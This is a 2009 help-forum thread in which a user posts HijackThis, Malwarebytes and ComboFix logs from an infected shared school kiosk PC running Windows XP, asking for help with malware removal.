hlnd, posted 15 October 2009 (edited)

Shared PC at school that someone has gotten infected; ran BitDefender's online scanner and a McAfee scan from the AV software installed on the machines, which nevertheless has evidently let something through.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:23:13, on 15.10.2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16915)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\windows\system32\cistub.exe
c:\epoagent\Common Framework\FrameworkService.exe
C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\Programfiler\UPHClean\uphclean.exe
c:\epoagent\Common Framework\UdaterUI.exe
c:\epoagent\Common Framework\McTray.exe
C:\WINDOWS\system32\mshta.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe
C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programfiler\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\Explorer.exe
C:\Programfiler\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\Opera10usb\OperaUSB.exe
C:\Documents and Settings\kiosk\Mine dokumenter\Downloads\spies.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://search.qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koblinger
R3 - URLSearchHook: QIPBHO Class - {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE} - C:\Documents and Settings\kiosk\Programdata\Microsoft\Internet Explorer\qipsearchbar.dll
R3 - URLSearchHook: (no name) - - (no file)
O2 - BHO: Koblingshjelpeprogram for Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programfiler\Fellesfiler\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll
O2 - BHO: QIPBHO - {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE} - C:\Documents and Settings\kiosk\Programdata\Microsoft\Internet Explorer\qipsearchbar.dll
O2 - BHO: (no name) - {DD1984BA-25E1-4F56-B124-A07ED6B2A87F} - C:\DOCUME~1\kiosk\LOKALE~1\Temp\ho.dll
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [CapaInstaller Info Center] "C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe" /autostart
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "c:\epoagent\Common Framework\UdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [shStatEXE] "C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programfiler\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [ikiosk33] C:\Programfiler\Internet Kiosk Pro\kiosk.exe run
O4 - HKLM\..\Run: [sysldtray] C:\windows\ld15.exe
O4 - HKLM\..\Run: [pp] C:\windows\pp12.exe
O4 - HKLM\..\RunOnce: [safetyCenter] C:\Programfiler\SafetyCenter\start.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Programfiler\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-19\..\Run: [Communicator] "C:\Programfiler\Microsoft Office Communicator\Communicator.exe" (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETTVERKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: Oppslag - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programfiler\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programfiler\Messenger\msmsgs.exe
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/...can8/oscan8.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1221728141109
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = fifk.vgs.no
O17 - HKLM\Software\..\Telephony: DomainName = fifk.vgs.no
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = fifk.vgs.no
O23 - Service: CapaInstaller Agent Service (cistub) - CapaSystems A/S - c:\windows\system32\cistub.exe
O23 - Service: McAfee Framework Service (McAfeeFramework) - McAfee, Inc. - c:\epoagent\Common Framework\FrameworkService.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe
O23 - Service: McAfee Task Manager (McTaskManager) - McAfee, Inc. - C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe

--
End of file - 7144 bytes

C:\Documents and Settings\kiosk\Mine dokumenter\Downloads\spies.exe is HijackThis.

Thanks in advance!

Edited 26 October 2009 by Bl4cKnD

norbat, posted 16 October 2009

There's some junk in there. Run through the guide and post the logs here in your own thread.

hlnd (author), posted 19 October 2009

Thanks for the reply. Currently on autumn break; I'll run through your guide when I get back.

hlnd (author), posted 26 October 2009 (edited)

There.

MBAM:

Malwarebytes' Anti-Malware 1.41
Databaseversjon: 3035
Windows 5.1.2600 Service Pack 3

26.10.2009 15:57:13
mbam-log-2009-10-26 (15-57-13).txt

Skanntype: Rask Skann
Objekter skannet: 126261
Tid tilbakelagt: 5 minute(s), 53 second(s)

Minneprosesser infisert: 0
Minnemoduler infisert: 1
Registernøkler infisert: 12
Registerverdier infisert: 5
Registerfiler infisert: 8
Mapper infisert: 1
Filer infisert: 22

Minneprosesser infisert:
(Ingen mistenkelige filer funnet)

Minnemoduler infisert:
C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\ho.dll (Trojan.FakeAlert) -> Delete on reboot.

Registernøkler infisert:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{dd1984ba-25e1-4f56-b124-a07ed6b2a87f} (Trojan.BHO.H) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\CLSID\{dd1984ba-25e1-4f56-b124-a07ed6b2a87f} (Trojan.BHO.H) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{dd1984ba-25e1-4f56-b124-a07ed6b2a87f} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\CLSID\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\NetworkNeighborhood\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\safetycenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\SafetyCenter (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\fioo32 (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Enum\Root\LEGACY_FIOO32 (Worm.KoobFace) -> Quarantined and deleted successfully.

Registerverdier infisert:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray (Worm.Koobface) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysfbtray (Worm.Koobface) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\safetycenter (Rogue.Installer) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\fioo32 (Worm.KoobFace) -> Quarantined and deleted successfully.

Registerfiler infisert:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecycleFiles (Disable.Recycle) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL (Hijack.DisplayProperties) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders (Hijack.Explorer) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize (Hijack.Explorer) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind (Hijack.Find) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions (Hijack.FolderOptions) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp (Hijack.Help) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr (Hijack.TaskManager) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Mapper infisert:
C:\Programfiler\SafetyCenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

Filer infisert:
C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\ho.dll (Trojan.BHO.H) -> Delete on reboot.
C:\WINDOWS\ld15.exe (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\pp12.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy71.exe (Worm.Koobface) -> Quarantined and deleted successfully.
C:\Programfiler\SafetyCenter\start.exe (Rogue.Installer) -> Quarantined and deleted successfully.
C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\settings.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\update.exe (Rogue.Installer) -> Quarantined and deleted successfully.
C:\Programfiler\SafetyCenter\main.ico (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Programfiler\SafetyCenter\new.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Programfiler\SafetyCenter\protector.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Programfiler\SafetyCenter\sound.wav (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Programfiler\SafetyCenter\uninstall.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\WINDOWS\rdr_1255600135.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\rdr_1255600142.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\rdr_1256543237.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\rdr_1256543238.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS10112010146116101.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS101120101464855.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS101120101464955.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS101120101465249.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\bk23567.dat (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\fdgg34353edfgdfdf (KoobFace.Trace) -> Quarantined and deleted successfully.

Combofix:

ComboFix 09-10-25.02 - kiosk 26.10.2009 16:17.1.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.3.1252.47.1044.18.510.252 [GMT 1:00]
Kjører fra: c:\documents and settings\kiosk\Mine dokumenter\Downloads\ComboFix.exe
AV: McAfee VirusScan Enterprise *On-access scanning disabled* (Updated) {918A2B0B-2C60-4016-A4AB-E868DEABF7F0}
.

((((((((((((((((((((((((((((((((((((((( Andre slettinger )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\data
c:\documents and settings\All Users\Programdata\Microsoft\Network\Downloader\qmgr0.dat
c:\documents and settings\All Users\Programdata\Microsoft\Network\Downloader\qmgr1.dat
c:\windows10112010146101105.rx
c:\windows\system32\NTSVc.ocx

----- BITS: Mulige infiserte sider -----

hxxp://wsus3
.
((((((((((((((((((((((((((( Filer Opprettet Fra 2009-09-26 til 2009-10-26 )))))))))))))))))))))))))))))))))
.

2009-10-26 14:59 . 2009-10-26 14:59 -------- d--h--r- c:\documents and settings\kiosk\Siste
2009-10-26 14:49 . 2009-10-26 14:49 -------- d-----w- c:\documents and settings\kiosk\Programdata\Malwarebytes
2009-10-26 14:49 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-10-26 14:49 . 2009-10-26 14:49 -------- d-----w- c:\documents and settings\All Users\Programdata\Malwarebytes
2009-10-26 14:49 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-10-15 20:03 . 2009-10-15 20:05 -------- d-----w- c:\documents and settings\kiosk\Lokale innstillinger\Programdata\Adobe
2009-10-15 16:15 . 2009-10-15 17:58 -------- d-----w- c:\windows\BDOSCAN8
2009-10-15 06:29 . 2009-10-15 06:29 -------- d-----w- c:\documents and settings\kiosk\Lokale innstillinger\Programdata\PCHealth
2009-10-14 14:33 . 2009-07-17 16:22 1436672 -c----w- c:\windows\system32\dllcache\query.dll
2009-10-14 14:33 . 2009-09-04 21:05 58880 -c----w- c:\windows\system32\dllcache\msasn1.dll
2009-10-14 09:20 . 2009-10-14 09:20 2198 ----a-w- C:\nAi.bat
2009-10-14 06:23 . 2009-10-26 14:41 -------- d-----w- C:\Quarantine
2009-10-11 10:06 . 2009-10-11 10:06 -------- d--h--w- c:\windows\PIF
2009-10-11 09:45 . 2009-10-11 10:00 -------- d-----w- c:\programfiler\Samurize
2009-10-04 12:54 . 2009-10-04 12:54 -------- d-----w- c:\documents and settings\kiosk\Lokale innstillinger\Programdata\ApplicationHistory
2009-10-01 16:50 . 2009-10-01 16:52 -------- d-----w- C:\d1b15194f2c5a89b99bc
2009-10-01 16:49 . 2009-10-01 16:50 -------- d-----w- c:\programfiler\QIP
2009-09-29 12:48 . 2009-09-29 12:48 -------- d-----w- c:\windows\Sun

.
(((((((((((((((((((((((((((((((((((((((( Find3M Rapport ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-10-26 15:27 . 2009-09-25 10:51 -------- d-----w- c:\programfiler\Internet Kiosk Pro
2009-10-26 08:21 . 2001-10-09 12:00 79648 ----a-w- c:\windows\system32\perfc014.dat
2009-10-26 08:21 . 2001-10-09 12:00 444036 ----a-w- c:\windows\system32\perfh014.dat
2009-09-25 13:34 . 2009-09-25 13:34 0 ----a-w- c:\windows\nsreg.dat
2009-09-25 09:01 . 2009-09-25 09:01 -------- d-----w- c:\programfiler\OpenXML-ODF Translator
2009-09-25 09:01 . 2009-09-25 09:01 -------- d-----w- c:\documents and settings\All Users\Programdata\iFinger
2009-09-25 09:00 . 2009-09-25 09:00 -------- d-----w- c:\programfiler\iFinger
2009-09-25 08:56 . 2009-09-25 08:56 262144 ----a-w- c:\windows\system32\default_user_class.dat
2009-09-25 08:56 . 2009-09-25 08:56 -------- d-----w- c:\programfiler\Microsoft SQL Server
2009-09-25 08:56 . 2009-09-25 08:56 -------- d-----w- c:\programfiler\Mathcad
2009-09-25 08:30 . 2009-09-25 08:30 -------- d-----w- c:\programfiler\UPHClean
2009-09-25 08:29 . 2009-09-25 08:29 -------- d-----w- c:\programfiler\Fronter AS
2009-09-25 08:29 . 2009-09-25 08:29 -------- d-----w- c:\programfiler\Microsoft Silverlight
2009-09-25 08:28 . 2009-09-25 08:28 -------- d-----w- c:\programfiler\Microsoft Office Communicator
2009-09-25 08:28 . 2009-09-25 08:28 -------- d-----w- c:\programfiler\activePDF
2009-09-25 08:21 . 2009-09-25 08:21 -------- d-----w- c:\programfiler\Samisk
2009-09-25 08:21 . 2009-09-25 08:20 -------- d-----w- c:\programfiler\Java
2009-09-25 08:20 . 2009-09-25 08:20 -------- d-----w- c:\programfiler\Fellesfiler\Java
2009-09-25 08:20 . 2009-09-25 08:19 -------- d-----w- c:\programfiler\Fellesfiler\Adobe
2009-09-25 08:14 . 2009-09-25 08:14 -------- d-----w- c:\programfiler\Microsoft Works
2009-09-25 08:13 . 2009-09-25 08:13 -------- d-----w- c:\programfiler\Microsoft.NET
2009-09-25 08:12 . 2009-09-25 08:11 -------- d-----w- c:\documents and settings\All Users\Programdata\McAfee
2009-09-25 08:12 . 2009-09-25 08:12 -------- d-----w- c:\programfiler\McAfee
2009-09-25 08:12 . 2009-09-25 08:12 -------- d-----w- c:\programfiler\Fellesfiler\McAfee
2009-09-25 08:11 . 2009-09-25 08:11 -------- d-----w- c:\programfiler\Fellesfiler\Cisco Systems
2009-09-25 08:10 . 2009-09-25 08:10 -------- d-----w- c:\programfiler\MSXML 4.0
2009-09-25 08:09 . 2009-09-25 08:06 -------- d-----w- c:\programfiler\CapaInstaller
2009-09-11 14:20 . 2001-10-09 12:00 136192 ----a-w- c:\windows\system32\msv1_0.dll
2009-09-10 08:43 . 2009-09-25 18:01 12352 ----a-w- c:\windows\system32\cistub.dat
2009-09-09 22:07 . 2009-09-09 22:07 -------- d-----w- c:\programfiler\MSBuild
2009-09-09 22:07 . 2009-09-09 22:07 -------- d-----w- c:\programfiler\Reference Assemblies
2009-09-04 21:05 . 2001-10-09 12:00 58880 ----a-w- c:\windows\system32\msasn1.dll
2009-08-29 07:32 . 2001-10-09 12:00 832512 ----a-w- c:\windows\system32\wininet.dll
2009-08-29 07:32 . 2008-09-16 11:15 78336 ----a-w- c:\windows\system32\ieencode.dll
2009-08-29 07:32 . 2001-10-09 12:00 17408 ----a-w- c:\windows\system32\corpol.dll
2009-08-26 08:02 . 2001-10-09 12:00 247326 ----a-w- c:\windows\system32\strmdll.dll
2009-08-06 17:24 . 2008-09-16 11:15 327896 ----a-w- c:\windows\system32\wucltui.dll
2009-08-06 17:24 . 2008-09-16 11:15 209632 ----a-w- c:\windows\system32\wuweb.dll
2009-08-06 17:24 . 2008-09-16 11:15 35552 ----a-w- c:\windows\system32\wups.dll
2009-08-06 17:24 . 2007-07-30 17:19 44768 ----a-w- c:\windows\system32\wups2.dll
2009-08-06 17:24 . 2008-09-16 22:35 53472 ----a-w- c:\windows\system32\wuauclt.exe
2009-08-06 17:24 . 2001-10-09 12:00 96480 ----a-w- c:\windows\system32\cdm.dll
2009-08-06 17:23 . 2008-09-16 11:15 575704 ----a-w- c:\windows\system32\wuapi.dll
2009-08-06 17:23 . 2008-09-16 22:35 1929952 ----a-w- c:\windows\system32\wuaueng.dll
2009-08-05 09:01 . 2001-10-09 12:00 204800 ----a-w- c:\windows\system32\mswebdvd.dll
2009-08-04 21:00 . 2001-10-09 12:00 2190976 ----a-w- c:\windows\system32\ntoskrnl.exe
2009-08-04 17:30 . 2001-10-06 13:26 2067840 ----a-w- c:\windows\system32\ntkrnlpa.exe
2009-07-29 04:38 . 2001-10-09 12:00 81920 ----a-w- c:\windows\system32\fontsub.dll
2009-07-29 04:38 . 2001-10-09 12:00 119808 ----a-w- c:\windows\system32\t2embed.dll
.

(((((((((((((((((((((((((((((((( Oppstartspunkter I Registeret )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Merk* tomme oppføringer & gyldige standardoppføringer vises ikke
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSMSGS"="c:\programfiler\Messenger\msmsgs.exe" [2008-04-14 1695232]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2004-08-20 155648]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2004-08-20 118784]
"CapaInstaller Info Center"="c:\programfiler\CapaInstaller\Client\Util\JobTrig.exe" [2008-06-16 1070448]
"McAfeeUpdaterUI"="c:\epoagent\Common Framework\UdaterUI.exe" [2007-10-20 136512]
"ShStatEXE"="c:\programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE" [2008-07-16 111952]
"Adobe Reader Speed Launcher"="c:\programfiler\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2007-10-10 39792]
"ikiosk33"="c:\programfiler\Internet Kiosk Pro\kiosk.exe" [2006-05-11 2062336]
"Malwarebytes Anti-Malware (reboot)"="c:\documents and settings\kiosk\Mine dokumenter\Programfiler\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]
"Communicator"="c:\programfiler\Microsoft Office Communicator\Communicator.exe" [2005-05-12 4167376]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableLockWorkstation"= 1 (0x1)
"DisableChangePassword"= 1 (0x1)
"DisableTaskMgr"= 1 (0x1)
"NoDispCPL"= 1 (0x1)
"NoSecCPL"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoMSAppLogo5ChannelNotify"= 1 (0x1)
"NoWelcomeScreen"= 1 (0x1)

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoSettingsWizards"= 1 (0x1)
"NoClose"= 1 (0x1)
"NoShellSearchButton"= 1 (0x1)
"NoControlPanel"= 1 (0x1)
"NoWinKeys"= 1 (0x1)
"NoRecycleFiles"= 1 (0x1)
"NoGoTo"= 1 (0x1)
"NoSMHelp"= 1 (0x1)
"NoHelp"= 1 (0x1)
"NoSMMyPictures"= 1 (0x1)
"NoStartMenuMyMusic"= 1 (0x1)
"NoSMMyDocs"= 1 (0x1)
"NoStartMenuNetworkPlaces"= 1 (0x1)
"NoFavoritesMenu"= 1 (0x1)
"NoNetworkConnections"= 1 (0x1)
"NoFind"= 1 (0x1)
"NoWindowsUpdate"= 1 (0x1)
"NoFolderOptions"= 1 (0x1)
"NoSetFolders"= 1 (0x1)
"NoSetTaskbar"= 1 (0x1)
"NoCustomizeWebView"= 1 (0x1)
"NoPrinters"= 1 (0x1)
"NoDesktop"= 1 (0x1)
"NoInternetIcon"= 1 (0x1)
"NoToolbarCustomize"= 1 (0x1)
"NoBandCustomize"= 1 (0x1)
"SpecifyDefaultButtons"= 1 (0x1)
"Btn_Folders"= 2 (0x2)
"Btn_Favorites"= 2 (0x2)
"Btn_Media"= 2 (0x2)
"Btn_History"= 2 (0x2)
"Btn_Fullscreen"= 2 (0x2)
"Btn_Tools"= 2 (0x2)
"Btn_MailNews"= 2 (0x2)
"Btn_Size"= 2 (0x2)
"Btn_Edit"= 2 (0x2)
"Btn_Discussions"= 2 (0x2)
"Btn_Cut"= 2 (0x2)
"Btn_Copy"= 2 (0x2)
"Btn_Paste"= 2 (0x2)
"Btn_Search"= 2 (0x2)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=

R0 vmscsi;vmscsi;c:\windows\system32\drivers\vmscsi.sys [30.11.2005 19:33 10880]
R2 cistub;CapaInstaller Agent Service;c:\windows\system32\CIStub.exe [25.09.2009 19:01 333168]
S0 ahcix86;ahcix86;c:\windows\system32\drivers\ahcix86.sys --> c:\windows\system32\drivers\ahcix86.sys [?]
S3 vmx_svga;vmx_svga;c:\windows\system32\drivers\vmx_svga.sys [10.09.2009 06:33 62768]
S3 vmxnet;VMware Ethernet Adapter Driver;c:\windows\system32\drivers\vmxnet.sys [10.09.2009 06:33 34992]

--- Andre tjenester/drivere lastet i minnet ---

*Deregistered* - mbr
*Deregistered* - PROCEXP113
*Deregistered* - uphcleanhlp
.
.
------- Tilleggsskanning -------
.
uDefault_Search_URL = hxxp://search.qip.ru
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
FF - ProfilePath - c:\documents and settings\kiosk\Programdata\Mozilla\Firefox\Profiles\4k72hyaa.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: keyword.URL - hxxp://search.qip.ru/search?from=FF&query=
FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava11.dll
